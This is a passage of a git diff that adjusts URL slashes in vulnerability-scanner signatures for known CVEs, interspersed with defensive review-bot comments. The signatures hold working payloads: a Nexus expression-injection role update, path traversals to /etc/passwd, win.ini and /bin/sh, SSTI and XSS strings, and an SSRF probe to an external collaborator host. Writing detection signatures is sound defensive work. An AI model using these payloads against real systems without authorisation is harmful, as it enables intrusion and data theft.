- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Content-Type: application/json
diff --git a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml
index 4e0bb69..997246d 100644
--- a/cves/nexus-repository-manager-rce-cve-2020-10204.yaml
+++ b/cves/nexus-repository-manager-rce-cve-2020-10204.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
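Review bot: The request body on the last line is a state-changing update of the built-in `anonymous` user (it sets `lastName` to `User2` and replaces its `roles`), so a successful probe persists a configuration change on the target rather than only reading a response. That deserves a comment in the signature, e.g. `# intrusive: rewrites the anonymous user's lastName/roles via coreui_User.update`. The injected role string `$\\c{1337*1337` has no closing brace in the visible body; confirm this matches the reference payload for CVE-2020-10204 rather than a truncation. No authentication header is visible in the hunk, so if this endpoint requires an admin session the signature will report nothing on vulnerable hosts unless credentials are supplied.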
diff --git a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
index 37fc18a..8738dae 100644
--- a/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
+++ b/cves/nginx-remote-integer-overflow-cve-2017-7529.yaml
@@ -4,13 +4,13 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
requests:
- method: GET
url: >-
- {{.root}}
+ {{.root}}/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
diff --git a/cves/nodejs-path-traversal-cve-2017-14849.yaml b/cves/nodejs-path-traversal-cve-2017-14849.yaml
index 78d7f51..753c8f2 100644
--- a/cves/nodejs-path-traversal-cve-2017-14849.yaml
+++ b/cves/nodejs-path-traversal-cve-2017-14849.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}/etc/passwd
+ {{.root}}/{{.endpoint}}/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/nodejs-path-traversal-cve-2018-3714.yaml b/cves/nodejs-path-traversal-cve-2018-3714.yaml
index fcc6e56..8aa587a 100644
--- a/cves/nodejs-path-traversal-cve-2018-3714.yaml
+++ b/cves/nodejs-path-traversal-cve-2018-3714.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}../../../../../etc/passwd
+ {{.root}}/{{.endpoint}}../../../../../etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/nostromo-rce-cve-2019-16278.yaml b/cves/nostromo-rce-cve-2019-16278.yaml
index 77f3935..6e2becc 100644
--- a/cves/nostromo-rce-cve-2019-16278.yaml
+++ b/cves/nostromo-rce-cve-2019-16278.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: POST
url: >-
- {{.root}}.%0d./.%0d./.%0d./.%0d./bin/sh
+ {{.root}}/.%0d./.%0d./.%0d./.%0d./bin/sh
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
body: >-
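Review bot: The new URL line requests `/.%0d./.%0d./.%0d./.%0d./bin/sh` with `POST`, which, given the file name's `rce`, appears intended to execute `/bin/sh` on the target with the request body as its input, and that body (`body: >-`) continues outside the hunk so I cannot see which command is run. The signature should say so explicitly, e.g. `# intrusive: executes /bin/sh on the target; keep the body a harmless marker command`, so a reader does not have to decode the path to learn this is a command-execution probe rather than a version check. The `.%0d./` segments also rely on the client sending `%0d` unchanged; if it is decoded to a raw CR before the request is built, the traversal will not reach the server as intended.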
diff --git a/cves/nuxeo-ssti-cve-2018-16341.yaml b/cves/nuxeo-ssti-cve-2018-16341.yaml
index 8e9da37..a0b5330 100644
--- a/cves/nuxeo-ssti-cve-2018-16341.yaml
+++ b/cves/nuxeo-ssti-cve-2018-16341.yaml
@@ -10,7 +10,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml
+ {{.root}}//nuxeo/login.jsp/pwn${1199128+7}.xhtml
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
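Review bot: The new URL line produces a double slash, `{{.root}}//nuxeo/login.jsp/...`, whereas every other signature in this commit joins `{{.root}}` and the path with a single `/`. This hunk does not touch the `params` block, so if `root` was already `{{.BaseURL}}` in this file the request now goes to `//nuxeo/...`, which some servers and proxies reject or normalise differently from `/nuxeo/...`. If the doubled slash is deliberate (a path-normalisation bypass), add a comment such as `# double slash intentional: path-normalisation bypass`; otherwise revert to `{{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml`.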
diff --git a/cves/odoo-lfi-cve-2018-15640.yaml b/cves/odoo-lfi-cve-2018-15640.yaml
index 556bb12..6487b5b 100644
--- a/cves/odoo-lfi-cve-2018-15640.yaml
+++ b/cves/odoo-lfi-cve-2018-15640.yaml
@@ -16,7 +16,7 @@ requests:
- method: GET
redirect: false
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- X-Requested-With: XMLHttpRequest
diff --git a/cves/olimpoks-xss-cve-2020-16270.yaml b/cves/olimpoks-xss-cve-2020-16270.yaml
index c9460f8..8500fe9 100644
--- a/cves/olimpoks-xss-cve-2020-16270.yaml
+++ b/cves/olimpoks-xss-cve-2020-16270.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/
+ {{.root}}/{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/openfire-ssrf-cve-2019-18394.yaml b/cves/openfire-ssrf-cve-2019-18394.yaml
index cc7ec96..fcef9aa 100644
--- a/cves/openfire-ssrf-cve-2019-18394.yaml
+++ b/cves/openfire-ssrf-cve-2019-18394.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?host=burpcollaborator.net
+ {{.root}}/{{.endpoint}}?host=burpcollaborator.net
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
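Review bot: The new URL line hard-codes `host=burpcollaborator.net`, a third-party domain the signature author does not control, so the SSRF can only be confirmed by whoever watches that collaborator and the scanned host's outbound traffic is directed at an external service by default. Make the callback a parameter so operators can point it at their own listener: add `- callback: 'burpcollaborator.net'` under `params:` and use `?host={{.callback}}` in the URL. The `detections:` block starts after the hunk, so I cannot see whether the match relies on the out-of-band hit or on the response body.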
diff --git a/cves/openschool-xss-cve-2019-14696.yaml b/cves/openschool-xss-cve-2019-14696.yaml
index 2cebed1..fabb695 100644
--- a/cves/openschool-xss-cve-2019-14696.yaml
+++ b/cves/openschool-xss-cve-2019-14696.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+ {{.root}}/{{.endpoint}}?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml
index 5defa11..d08d8e1 100644
--- a/cves/oracle-bi-path-traversal-cve-2019-2588.yaml
+++ b/cves/oracle-bi-path-traversal-cve-2019-2588.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
+ {{.root}}/{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
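Review bot: The new URL line only probes a Windows file (`..%5C..%5C...%5CWindows%5Cwin.ini`, backslash separators), so Oracle BI Publisher instances on Linux are never detected by this signature. If the traversal also accepts forward slashes on POSIX hosts, add a second URL line such as `{{.root}}/{{.endpoint}}?format=aaaaaaaaaaaaaaa&documentId=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd` and extend the detection block (outside the hunk) to match either file; otherwise add a comment stating `# Windows targets only: probes win.ini` so the coverage gap is documented.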
diff --git a/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml
index 0d401ce..d3374dd 100644
--- a/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml
+++ b/cves/oracle-iplanet-improper-authorization-cve-2020-9315.yaml
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/oracle-sgd-xss-cve-2018-19439.yaml b/cves/oracle-sgd-xss-cve-2018-19439.yaml
index 9ec3b18..4b90161 100644
--- a/cves/oracle-sgd-xss-cve-2018-19439.yaml
+++ b/cves/oracle-sgd-xss-cve-2018-19439.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?=&windowTitle=AdministratorHelpWindow>